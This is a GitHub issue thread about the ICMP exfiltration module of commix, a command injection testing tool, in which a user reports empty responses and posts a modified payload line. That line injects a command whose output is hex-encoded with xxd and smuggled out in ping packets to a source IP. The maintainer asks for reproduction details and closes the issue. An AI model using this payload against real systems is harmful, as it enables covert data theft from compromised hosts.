### ISSUE TITLE
icmp-exfil no bytes in data section (empty response)

### ISSUE THREAD

**Issue by justsly** [commixproject/commix#65] opened 2017-02-17 14:38 UTC
i don't get any response when I try the icmp-exfil module. I check it with Wireshark and there aren't any bytes added in the data section.

I fixed it for me with Line 69:

> exfiltration_length = 16 

and Line 97:

> payload = ("; " + cmd + " | xxd -p -c" + str(exfiltration_length) + " | while read line; do ping -p $line -c1 -s" + str(exfiltration_length * 3) + " -q " + ip_src + "; done")

Maybe this works for others too. :)

**Comment by stasinopoulos** [comment] 2017-02-17 15:57
Hey, thanks :) I'll check it out soon!

**Comment by stasinopoulos** [comment] 2017-02-21 17:55
Hey, could you please provide me more information about this bug? For instance, what version of Commix do you use and a test case scenario in which you don't get any response. I was not able to reproduce this bug.

**Comment by stasinopoulos** [comment] 2017-05-21 08:02
Could you please confirm that the problem that you are describing still exists? If yes please provide me more information about this bug  (i.e what version of Commix do you use and a test case scenario in which you don't get any response. I was not able to reproduce this bug).

**Comment by stasinopoulos** [comment] 2017-06-14 08:51
Closing due to lack of user response

**Closed by stasinopoulos** 2017-06-14 08:51 UTC
Labels: enhancement, module
